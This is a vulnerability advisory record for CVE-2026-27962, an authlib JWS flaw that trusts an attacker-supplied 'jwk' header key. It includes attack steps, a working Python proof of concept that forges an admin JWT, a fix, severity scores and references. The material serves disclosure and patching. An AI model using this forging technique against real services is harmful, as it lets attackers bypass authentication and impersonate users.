Summary\n\nA JWK Header Injection vulnerability in `authlib`'s JWS implementation allows an unauthenticated\nattacker to forge arbitrary JWT tokens that pass signature verification. When `key=None` is passed\nto any JWS deserialization function, the library extracts and uses the cryptographic key embedded\nin the attacker-controlled JWT `jwk` header field. An attacker can sign a token with their own\nprivate key, embed the matching public key in the header, and have the server accept the forged\ntoken as cryptographically valid — bypassing authentication and authorization entirely.\n\nThis behavior violates **RFC 7515 §4.1.3** and the validation algorithm defined in **RFC 7515 §5.2**.\n\n### Details\n\n**Vulnerable file:** `authlib/jose/rfc7515/jws.py` \n**Vulnerable method:** `JsonWebSignature._prepare_algorithm_key()` \n**Lines:** 272–273\n\n```python\nelif key is None and \"jwk\" in header:\n key = header[\"jwk\"] # ← attacker-controlled key used for verification\n```\n\nWhen `key=None` is passed to `jws.deserialize_compact()`, `jws.deserialize_json()`, or\n`jws.deserialize()`, the library checks the JWT header for a `jwk` field. If present, it extracts\nthat value — which is fully attacker-controlled — and uses it as the verification key.\n\n**RFC 7515 violations:**\n\n- **§4.1.3** explicitly states the `jwk` header parameter is **\"NOT RECOMMENDED\"** because keys\n embedded by the token submitter cannot be trusted as a verification anchor.\n- **§5.2 (Validation Algorithm)** specifies the verification key MUST come from the *application\n context*, not from the token itself. There is no step in the RFC that permits falling back to\n the `jwk` header when no application key is provided.\n\n**Why this is a library issue, not just a developer mistake:**\n\nThe most common real-world trigger is a **key resolver callable** used for JWKS-based key lookup.\nA developer writes:\n\n```python\ndef lookup_key(header, payload):\n kid = header.get(\"kid\")\n return jwks_cache.get(kid) # returns None when kid is unknown/rotated\n\njws.deserialize_compact(token, lookup_key)\n```\n\nWhen an attacker submits a token with an unknown `kid`, the callable legitimately returns `None`.\nThe library then silently falls through to `key = header[\"jwk\"]`, trusting the attacker's embedded\nkey. The developer never wrote `key=None` — the library's fallback logic introduced it. The result\nlooks like a verified token with no exception raised, making the substitution invisible.\n\n**Attack steps:**\n\n1. Attacker generates an RSA or EC keypair.\n2. Attacker crafts a JWT payload with any desired claims (e.g. `{\"role\": \"admin\"}`).\n3. Attacker signs the JWT with their **private** key.\n4. Attacker embeds their **public** key in the JWT `jwk` header field.\n5. Attacker uses an unknown `kid` to cause the key resolver to return `None`.\n6. The library uses `header[\"jwk\"]` for verification — signature passes.\n7. Forged claims are returned as authentic.\n\n### PoC\n\nTested against **authlib 1.6.6** (HEAD `a9e4cfee`, Python 3.11).\n\n**Requirements:**\n```\npip install authlib cryptography\n```\n\n**Exploit script:**\n```python\nfrom authlib.jose import JsonWebSignature, RSAKey\nimport json\n\njws = JsonWebSignature([\"RS256\"])\n\n# Step 1: Attacker generates their own RSA keypair\nattacker_private = RSAKey.generate_key(2048, is_private=True)\nattacker_public_jwk = attacker_private.as_dict(is_private=False)\n\n# Step 2: Forge a JWT with elevated privileges, embed public key in header\nheader = {\"alg\": \"RS256\", \"jwk\": attacker_public_jwk}\nforged_payload = json.dumps({\"sub\": \"attacker\", \"role\": \"admin\"}).encode()\nforged_token = jws.serialize_compact(header, forged_payload, attacker_private)\n\n# Step 3: Server decodes with key=None — token is accepted\nresult = jws.deserialize_compact(forged_token, None)\nclaims = json.loads(result[\"payload\"])\nprint(claims) # {'sub': 'attacker', 'role': 'admin'}\nassert claims[\"role\"] == \"admin\" # PASSES\n```\n\n**Expected output:**\n```\n{'sub': 'attacker', 'role': 'admin'}\n```\n\n**Docker (self-contained reproduction):**\n```bash\nsudo docker run --rm authlib-cve-poc:latest \\\n python3 /workspace/pocs/poc_auth001_jws_jwk_injection.py\n```\n\n### Impact\n\nThis is an authentication and authorization bypass vulnerability. Any application using authlib's\nJWS deserialization is affected when:\n\n- `key=None` is passed directly, **or**\n- a key resolver callable returns `None` for unknown/rotated `kid` values (the common JWKS lookup pattern)\n\nAn unauthenticated attacker can impersonate any user or assume any privilege encoded in JWT claims\n(admin roles, scopes, user IDs) without possessing any legitimate credentials or server-side keys.\nThe forged token is indistinguishable from a legitimate one — no exception is raised.\n\nThis is a violation of **RFC 7515 §4.1.3** and **§5.2**. The spec is unambiguous: the `jwk`\nheader parameter is \"NOT RECOMMENDED\" as a key source, and the validation key MUST come from\nthe application context, not the token itself.\n\n**Minimal fix** — remove the fallback from `authlib/jose/rfc7515/jws.py:272-273`:\n```python\n# DELETE:\nelif key is None and \"jwk\" in header:\n key = header[\"jwk\"]\n```\n\n**Recommended safe replacement** — raise explicitly when no key is resolved:\n```python\nif key is None:\n raise MissingKeyError(\"No key provided and no valid key resolvable from context.\")\n```", "title": "github - https://api.github.com/advisories/GHSA-wvwj-cvrp-7pv5" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:5665.json" }, { "category": "other", "text": "0.00064", "title": "EPSS" }, { "category": "other", "text": "3.8", "title": "NCSC Score" }, { "category": "other", "text": "VENDOR FIX as product remediation category, Is related to CWE-347 (Improper Verification of Cryptographic Signature)", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is product_remediation data available from source Redhat, The value of the most recent EPSS score, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "fixed": [ "CSAFPID-5846430", "CSAFPID-5903532" ], "known_affected": [ "CSAFPID-5830119", "CSAFPID-1439279", "CSAFPID-1439313", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1508257", "CSAFPID-2831634", "CSAFPID-5035448", "CSAFPID-5068100", "CSAFPID-5068103", "CSAFPID-5068105", "CSAFPID-5068108", "CSAFPID-5068110", "CSAFPID-5068114", "CSAFPID-5068116", "CSAFPID-5068119", "CSAFPID-5068121", "CSAFPID-5068123", "CSAFPID-5068126", "CSAFPID-5068128", "CSAFPID-5068131", "CSAFPID-5068134", "CSAFPID-5155537", "CSAFPID-5155538", "CSAFPID-5222639", "CSAFPID-5222767", "CSAFPID-5222780", "CSAFPID-5355695", "CSAFPID-5811359", "CSAFPID-1405217", "CSAFPID-1405218" ], "known_not_affected": [ "CSAFPID-5474797", "CSAFPID-5474798", "CSAFPID-5846431", "CSAFPID-5846432", "CSAFPID-5846433", "CSAFPID-5846434", "CSAFPID-5846435", "CSAFPID-5846436", "CSAFPID-5846437", "CSAFPID-5846438", "CSAFPID-5846439", "CSAFPID-5903533", "CSAFPID-5903534", "CSAFPID-5903535", "CSAFPID-5903536", "CSAFPID-5903537", "CSAFPID-5903538", "CSAFPID-5903539", "CSAFPID-5903540", "CSAFPID-5903541" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-wvwj-cvrp-7pv5" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-wvwj-cvrp-7pv5" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27962" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27962" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27962.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27962" }, { "category": "external", "summary": "Source raw - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27962.json" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-27962" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27962" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/errata/RHSA-2026:4942" }, { "category": "external", "summary": "Source raw - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:4942.json" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-wvwj-cvrp-7pv5" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:5665.json" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/authlib/authlib/releases/tag/v1.6.9" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-wvwj-cvrp-7pv5" }, { "category": "external", "summary": "Reference - github; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27962" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27962" }, { "category": "external", "summary": "Reference - redhat", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448164" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/errata/RHSA-2026:4942" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61726" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61728" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61729" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-68121" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-24049" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-25639" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-25990" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-26996" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27628" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27904" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-28802" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/updates/classification/" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_4942.json" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/errata/RHSA-2026:5665" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-26007" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27606" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5665.json" } ], "remediations": [ { "category": "vendor_fix", "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "CSAFPID-5256659", "CSAFPID-5846430" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:4942" }, { "category": "vendor_fix", "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "CSAFPID-5209636", "CSAFPID-5903532" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:5665" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL" }, "products": [ "CSAFPID-1405217", "CSAFPID-1405218", "CSAFPID-1439279", "CSAFPID-1439313", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1508257", "CSAFPID-2831634", "CSAFPID-5035448", "CSAFPID-5068100", "CSAFPID-5068103", "CSAFPID-5068105", "CSAFPID-5068108", "CSAFPID-5068110", "CSAFPID-5068114", "CSAFPID-5068116", "CSAFPID-5068119", "CSAFPID-5068121", "CSAFPID-5068123", "CSAFPID-5068126", "CSAFPID-5068128", "CSAFPID-5068131", "CSAFPID-5068134", "CSAFPID-5155537", "CSAFPID-5155538", "CSAFPID-5222639", "CSAFPID-5222767", "CSAFPID-5222780", "CSAFPID-5355695", "CSAFPID-5811359", "CSAFPID-5830119" ] } ], "title": "CVE-2026-27962" } ] }